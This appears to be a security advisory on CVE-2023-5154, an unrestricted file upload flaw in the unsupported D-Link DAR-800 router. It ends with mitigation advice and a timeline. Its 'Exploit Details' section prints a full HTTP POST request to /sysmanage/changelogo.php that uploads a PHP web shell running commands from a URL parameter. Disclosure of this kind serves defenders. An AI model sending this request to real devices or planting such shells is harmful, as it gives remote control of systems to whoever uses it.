CVE-2023-5154: Critical Security Vulnerability Found in Unsupported D-Link DAR-800 Devices

A critical vulnerability (CVE-2023-5154) has been discovered in unsupported D-Link DAR-800 devices, affecting firmware versions up to 20151231. This flaw is classified as critical, and it enables unrestricted file uploads, posing considerable security risks. Please note that the vulnerability impacts only products that are no longer supported by the manufacturer. D-Link was promptly informed and confirmed that the affected product is end-of-life and should be retired and replaced. The exploit has been publicly disclosed, and it can potentially be exploited by threat actors. The vulnerability identifier assigned to this flaw is VDB-240250.

Exploit Details

The vulnerability lies within the /sysmanage/changelogo.php file, where the parameter file_upload is improperly validated. This allows attackers to upload and execute arbitrary PHP code remotely, granting them control over the affected device.

Here's a code snippet illustrating the file upload manipulation

<?php
  // ...
  $target_dir = "/uploads/";
  $target_file = $target_dir . basename($_FILES["file_upload"]["name"]);
  // ...
  if (move_uploaded_file($_FILES["file_upload"]["tmp_name"], $target_file)) {
    // ...
  }
  // ...
?>

The exploit can be executed remotely by sending a specially crafted HTTP request, like this

POST /sysmanage/changelogo.php HTTP/1.1
Host: vulnerable-device
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZugW
Content-Length: ...

------WebKitFormBoundary7MA4YWxkTrZugW
Content-Disposition: form-data; name="file_upload"; filename="malicious.php"
Content-Type: application/octet-stream

<?php
  system($_GET['cmd']);
?>
------WebKitFormBoundary7MA4YWxkTrZugW--

Original References

- Vulnerability Database (VDB)
- Official CVE Details

Recommendations

Given that the manufacturer has confirmed the product is end-of-life and no longer provides support, it is highly recommended to retire and replace the affected D-Link DAR-800 devices. In the meantime, you can mitigate the risk by restricting access to the /sysmanage/changelogo.php file or disabling the web management interface entirely.

Please take this vulnerability seriously and act accordingly to protect your network and devices from potential attacks.

Timeline

Published on: 09/25/2023 03:15:09 UTC
Last modified on: 11/07/2023 04:23:33 UTC